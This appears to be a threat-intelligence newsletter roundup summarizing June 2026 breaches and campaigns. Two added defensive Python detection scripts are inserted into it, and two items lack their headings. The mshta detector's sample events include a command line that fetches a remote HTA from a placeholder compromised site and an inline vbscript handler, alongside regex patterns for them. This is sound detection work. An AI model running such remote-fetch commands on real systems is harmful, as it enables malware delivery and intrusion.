Threat Intelligence RoundUp: June

July 01, 2026

Our analyst team shares a few articles each week in our email newsletter, which goes out every Thursday. Make sure to register! This blog highlights those articles in order of how popular they were in our newsletter – what our readers found the most intriguing. Stay tuned for a recap every month. We hope sharing these resources and news articles emphasizes the importance of cybersecurity and sheds light on the latest in threat intelligence.

1. French govt messaging service breached in account hijacking attack – Bleeping Computer

France’s digital affairs directorate (DINUM) disclosed a breach of Tchap, the French government’s encrypted messaging platform, after attackers gained access through a compromised user account. The incident was detected by ANSSI on Sunday, and authorities have notified the CNIL due to potential exposure of personal data. A threat actor claimed the breach resulted from a social engineering attack, alleging they obtained leaked LDAP credentials and exfiltrated over 13.5GB of documents and media files shared by government employees. While DINUM has not confirmed these claims, it has alerted all Tchap users and reminded them that public chat rooms are not encrypted. Read full article.

2. FBI Warns of Phishing-as-a-Service Platform Compromising Microsoft 365 – ic3

The FBI has issued a warning about Kali365, a phishing-as-a-service (PhaaS) platform used to compromise Microsoft 365 accounts. The platform leverages device code phishing techniques, abusing OAuth device code authentication to steal session tokens and circumvent multi-factor authentication (MFA). This authentication method lets devices with limited input capabilities, such as smart TVs, conference room systems, streaming devices, printers, and IoT devices, sign in by entering a short code on another device through Microsoft’s device code login portal. Beginning in April, the platform was distributed via Telegram channels to cybercriminals looking for an easier way to compromise Microsoft 365.
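Because the device code flow is legitimate and MFA-compliant, the defender's signal is not a failed login but an unusual authentication protocol. The following script is an added example (not from the FBI advisory or from DarkOwl) that scans a JSON-lines export of Microsoft Entra sign-in records and reports every device code sign-in, escalating those from an unexpected country, from an IP the user never used interactively, or with no Conditional Access policy applied. The field names (`authenticationProtocol`, `conditionalAccessStatus`, `location.countryOrRegion`) follow the sign-in log schema as I understand it and should be treated as assumptions; the records themselves are constructed.

```python
import json
from collections import defaultdict

# Constructed sample in the shape of a JSON-lines sign-in export. Assumption:
# authenticationProtocol == "deviceCode" marks the OAuth device authorization grant.
SAMPLE_SIGNIN_LOG = """\
{"createdDateTime": "2026-06-03T08:14:02Z", "userPrincipalName": "alice@example.test", "authenticationProtocol": "authorizationCodeGrant", "ipAddress": "198.51.100.10", "location": {"countryOrRegion": "US"}, "appDisplayName": "Microsoft Office", "conditionalAccessStatus": "success"}
{"createdDateTime": "2026-06-03T08:20:41Z", "userPrincipalName": "alice@example.test", "authenticationProtocol": "deviceCode", "ipAddress": "203.0.113.77", "location": {"countryOrRegion": "NL"}, "appDisplayName": "Microsoft Azure CLI", "conditionalAccessStatus": "notApplied"}
{"createdDateTime": "2026-06-03T09:02:17Z", "userPrincipalName": "bob@example.test", "authenticationProtocol": "authorizationCodeGrant", "ipAddress": "192.0.2.25", "location": {"countryOrRegion": "US"}, "appDisplayName": "Microsoft Teams", "conditionalAccessStatus": "success"}
{"createdDateTime": "2026-06-03T09:05:55Z", "userPrincipalName": "bob@example.test", "authenticationProtocol": "deviceCode", "ipAddress": "192.0.2.25", "location": {"countryOrRegion": "US"}, "appDisplayName": "Microsoft Azure CLI", "conditionalAccessStatus": "success"}
"""

# Constructed: countries from which this tenant's users are expected to sign in.
EXPECTED_COUNTRIES = {"US"}


def parse_signin_log(text):
    """Parse a JSON-lines export into a list of dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_device_code_signins(records, expected_countries=EXPECTED_COUNTRIES):
    """Return (upn, timestamp, reasons) for every device code sign-in.

    Every device code sign-in is reported because the flow is rare for
    ordinary users; the reasons list grows when the sign-in also comes from
    an unexpected country, from an IP absent from the user's interactive
    sign-ins in the same export, or without a Conditional Access decision.
    """
    # First pass: IPs each user has used with ordinary (non-device-code) flows.
    interactive_ips = defaultdict(set)
    for r in records:
        if r.get("authenticationProtocol") != "deviceCode":
            interactive_ips[r["userPrincipalName"]].add(r["ipAddress"])

    findings = []
    for r in records:
        if r.get("authenticationProtocol") != "deviceCode":
            continue
        upn = r["userPrincipalName"]
        reasons = ["device code flow used"]
        country = r.get("location", {}).get("countryOrRegion")
        if country not in expected_countries:
            reasons.append(f"sign-in country {country} not in expected set")
        if r["ipAddress"] not in interactive_ips[upn]:
            reasons.append("IP not seen in user's interactive sign-ins")
        if r.get("conditionalAccessStatus") != "success":
            reasons.append("no Conditional Access policy enforced on this sign-in")
        findings.append((upn, r["createdDateTime"], reasons))
    return findings


if __name__ == "__main__":
    for upn, when, reasons in find_device_code_signins(parse_signin_log(SAMPLE_SIGNIN_LOG)):
        print(f"{when} {upn}: " + "; ".join(reasons))
```

Sign-ins that carry only the first reason (as bob's does, from an IP he also uses interactively) are the legitimate headless or CLI cases the flow exists for; the ones that accumulate several reasons are the records to pull session tokens for. Where the flow is not needed at all, a Conditional Access policy can block it outright, which removes the phishing lure rather than detecting it after the fact.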

The Silent Ransom Group (SRG) is actively targeting law firms through sophisticated social engineering campaigns. Threat actors typically impersonate IT support personnel via phone calls and phishing emails to gain access to victim systems. Once trust is established, they use legitimate remote access tools to infiltrate networks and exfiltrate sensitive data. In some cases, SRG has reportedly gone a step further by sending individuals to a victim organization’s office to obtain physical access to computers. This activity follows an FBI FLASH advisory issued last week warning that SRG was targeting U.S. law firms through social engineering schemes and in-person data theft operations. Mandiant has released additional technical details describing the group’s intrusion methods. According to Mandiant, SRG targeted dozens of organizations across the legal, financial, and professional services sectors between January and May 2026. Read more here.

On May 27, the Spanish National Police arrested the individual behind data leaks that published information from the State Attorney General’s Office, the National Cybersecurity Institute (INCIBE), the National Police, the Civil Guard, and the National Security Council. In February, INCIBE reported an ongoing doxing operation that collected and published data on key entities and their employees. Potential sources of this information include historical data breaches, credential dumps, and OSINT tools. The data may have been aggregated and correlated from multiple sources to create curated datasets. Some leaked records reportedly contained outdated information, including the names of individuals who had left INCIBE several years earlier. Read here.

5. Hackers hijack thousands of sites for ClickFix and FakeUpdate attacks – Bleeping Computer

Observed activity indicates the threat actor DriveSurge is leveraging compromised websites to facilitate a large-scale distribution campaign utilizing ClickFix and FakeUpdates techniques. Researchers at Silent Push report the DriveSurge campaign has compromised thousands of websites, redirecting visitors to malware-delivery infrastructure. The operation relies on social engineering tactics like ClickFix, which tricks users into running malicious commands under the guise of fixing issues, and FakeUpdates, which uses fake browser update prompts to install malware. Silent Push says DriveSurge mainly acts as an Initial Access Broker (IAB) using a pay-per-install (PPI) model, selling access to infected systems for follow-on cyberattacks. Learn more.

6. FBI warns of in-person data theft attacks from extortion gang – Bleeping Computer

In a recent FBI flash alert, the agency warned that the Silent Ransom Group (SRG) has been targeting U.S.-based law firms through in-person data theft operations. Reports claim that SRG actors employ social engineering tactics by impersonating members of a victim organization’s IT department. These actors either place direct phone calls or send phishing emails instructing employees to contact a fraudulent IT support representative. During the interaction, the SRG actor persuades the employee to grant access through a remote desktop session. If remote access attempts are unsuccessful, SRG may dispatch an individual to the victim’s physical location to obtain direct access and insert a storage device into the victim’s computer. Read full article.

7. China-linked JDY botnet expands targeting of U.S. military networks – Bleeping Computer

The JDY botnet, previously linked to Chinese threat actors such as Volt Typhoon, has significantly expanded its targeting and reconnaissance activities. Researchers at Black Lotus Labs report that JDY remains heavily focused on the United States, particularly military and related networks. The botnet has grown from about 650 active bots in January 2024 to more than 1,500 compromised SOHO and IoT devices today. Analysis of the activity indicates that China-nexus APT actors rapidly operationalize reconnaissance efforts following public vulnerability disclosures, focusing on identifying and targeting vulnerable infrastructure. This activity has been observed across multiple sectors, with U.S. military networks and affiliated organizations representing a primary area of interest. Read full article.

8. Pakistan-Linked SideCopy Targets Afghanistan Finance Ministry with Xeno RAT – The Hacker News

The Pakistan-aligned threat group SideCopy is believed to be behind a spear-phishing campaign, called Operation XENOFISCAL, targeting Afghanistan’s Ministry of Finance and other government entities. The attack uses a malicious Windows Shortcut (LNK) file that launches “mshta.exe” to retrieve a remote HTA file from a compromised Afghan education website. This file executes obfuscated JavaScript in memory, establishes persistence by impersonating Microsoft Edge through Registry modifications, and deploys Xeno RAT 1.8.7 using a DLL-based loader. A decoy document is also displayed to distract victims. Additional targets include provincial revenue and finance directorates, Pashto-speaking government officials, and other provincial government employees. Learn more.
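The first observable step of that chain is a living-off-the-land binary, mshta.exe, being handed a remote URL. The script below is an added example (not from The Hacker News article or from DarkOwl) that runs a simple detection over constructed Sysmon-style process creation events: it flags mshta.exe when its command line contains an http(s) URL or an inline `vbscript:`/`javascript:` handler, and notes when the parent is explorer.exe, which is what a user double-clicking a shortcut file looks like. Event field names (`Image`, `CommandLine`, `ParentImage`) follow Sysmon Event ID 1; the hostnames and paths are made up.

```python
import re

# Constructed sample events in the shape of Sysmon Event ID 1 (process creation).
# The URL and paths are placeholders, not indicators from the campaign.
SAMPLE_EVENTS = [
    {"EventId": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": '"C:\\Windows\\System32\\mshta.exe" http://compromised-site.example/docs/view.hta',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventId": 2, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": '"C:\\Windows\\System32\\mshta.exe" "C:\\Program Files\\Vendor\\setup.hta"',
     "ParentImage": r"C:\Program Files\Vendor\installer.exe"},
    {"EventId": 3, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta.exe vbscript:Execute("MsgBox 1")',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventId": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\backup.ps1",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
]

REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
INLINE_SCRIPT = re.compile(r"\b(vbscript|javascript):", re.IGNORECASE)


def is_mshta(event):
    """True when the created process image is mshta.exe (case-insensitive)."""
    return event.get("Image", "").lower().endswith("\\mshta.exe")


def flag_mshta_events(events):
    """Return (EventId, reasons) for mshta.exe launches that warrant review.

    A remote URL or an inline script handler on the command line is the
    trigger; an explorer.exe parent is recorded as supporting context
    (consistent with a user opening a shortcut) but does not fire on its own.
    """
    findings = []
    for ev in events:
        if not is_mshta(ev):
            continue
        cmd = ev.get("CommandLine", "")
        reasons = []
        if REMOTE_URL.search(cmd):
            reasons.append("mshta.exe fetching a remote HTA over http(s)")
        if INLINE_SCRIPT.search(cmd):
            reasons.append("mshta.exe executing an inline script handler")
        if not reasons:
            continue  # local .hta files are common enough to leave to a separate rule
        if ev.get("ParentImage", "").lower().endswith("\\explorer.exe"):
            reasons.append("spawned by explorer.exe (user-initiated, e.g. from a shortcut)")
        findings.append((ev["EventId"], reasons))
    return findings


if __name__ == "__main__":
    for event_id, reasons in flag_mshta_events(SAMPLE_EVENTS):
        print(f"event {event_id}: " + "; ".join(reasons))
```

Event 2, a locally installed HTA run by a vendor installer, is deliberately left alone so the rule stays quiet on the most common benign case; if your environment has no legitimate use of mshta.exe at all, blocking it with an application control policy is simpler than tuning a detection.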


Make sure to register for our weekly newsletter to get access to what our analysts are reading on a weekly basis.

Copyright © 2026 DarkOwl, LLC All rights reserved.